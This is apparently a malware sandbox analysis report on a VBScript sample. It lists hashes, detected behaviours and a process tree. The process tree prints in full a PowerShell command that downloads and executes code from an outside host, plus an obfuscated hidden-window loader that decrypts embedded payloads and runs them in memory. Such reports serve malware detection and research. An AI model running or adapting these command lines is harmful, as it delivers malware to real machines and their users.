Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
09-12-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
1821_output.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
1821_output.vbs
Resource
win7-20241010-en
Behavioral task
behavioral3
Sample
1821_output.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
1821_output.vbs
Resource
win10ltsc2021-20241023-en
General
-
Target
1821_output.vbs
-
Size
61KB
-
MD5
6943e4c37b93c2a81a98a81e36d2d5ce
-
SHA1
ad2ba17165344f88b6bf0befaac528feb8a3280f
-
SHA256
57bf3620d73728f07bed5cd48af70ca89dc70721b62c084f5f0feebed7f81a4f
-
SHA512
78034880a195d5dc7729a6c7631a660f9945dd368a86b50b458e70e0191a7953ba47435c242c94ce8548832e4920e08949fcb1aa099d5d7b927da9bc9b69cf80
-
SSDEEP
768:ni1+nYY2MDjo2CLlIbkrMvrIzkoILj2AA3drdg8KCklQCdUq13ZZIwX+Ay6Iwcgh:iXvlIkgvrWC3ASCk0q13HX+C9czhG
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2656 powershell.exe 2948 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2656 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2948 powershell.exe 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2172 wrote to memory of 2156 2172 WScript.exe 30 PID 2172 wrote to memory of 2156 2172 WScript.exe 30 PID 2172 wrote to memory of 2156 2172 WScript.exe 30 PID 2156 wrote to memory of 2948 2156 cmd.exe 32 PID 2156 wrote to memory of 2948 2156 cmd.exe 32 PID 2156 wrote to memory of 2948 2156 cmd.exe 32 PID 2172 wrote to memory of 2116 2172 WScript.exe 34 PID 2172 wrote to memory of 2116 2172 WScript.exe 34 PID 2172 wrote to memory of 2116 2172 WScript.exe 34 PID 2116 wrote to memory of 2656 2116 cmd.exe 36 PID 2116 wrote to memory of 2656 2116 cmd.exe 36 PID 2116 wrote to memory of 2656 2116 cmd.exe 36 PID 2116 wrote to memory of 2656 2116 cmd.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1821_output.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('przvDUO3TwKRjvdqBS3ijZmAMoLKmapNSNZNxjSSlQU='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j86NpELwD0eEb75+pqv1Rw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD55658af2134929280550a46a39d5d1254
SHA1757ce11f87e3886b0320fca0bd6bf1f26968a25e
SHA256942cc99875f60e2aef139a7d8e8341409d2dd4625573f32cbe292124838cdeed
SHA512e7ac74d0f9182d563dcb5765c160bec3ea4ede13a0a2612bafc5c8451393f3646430c340df57f1ad02807d9b610f55da0db2c67d531de21e91c21ebfe3cea1c8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6CPGH2S53A9TDBQTXLCA.temp
Filesize7KB
MD50be5795cabf21b8e31b60fd355adfa5f
SHA1f783624d176695e823bccedc496fe43660ebca3d
SHA256c081f459ea6d5da5bffa0397efcc78229bbfafb0c398471734d0984ef933d9eb
SHA512fe39b38768a03cca6daf0804f641bc3603c7571e96be37a60b3a7b2889cdeec853ae859d523825a5eb3f20882a3ec775f4349be9c4a36defefd75bf251c4af48